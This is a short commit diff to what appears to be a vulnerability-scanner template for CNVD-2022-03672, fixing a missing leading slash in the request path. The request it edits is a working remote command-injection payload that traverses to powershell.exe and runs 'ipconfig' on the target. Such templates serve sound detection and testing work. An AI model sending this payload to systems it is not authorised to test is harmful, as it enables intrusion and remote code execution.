added missing path

--- a/cnvd/2022/CNVD-2022-03672.yaml
+++ b/cnvd/2022/CNVD-2022-03672.yaml
@@ -19,7 +19,7 @@ requests:
 
         action=verify-haras
       - |
-        GET check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
+        GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
         Host: {{Hostname}}
         Cookie: CID={{cid}}
 
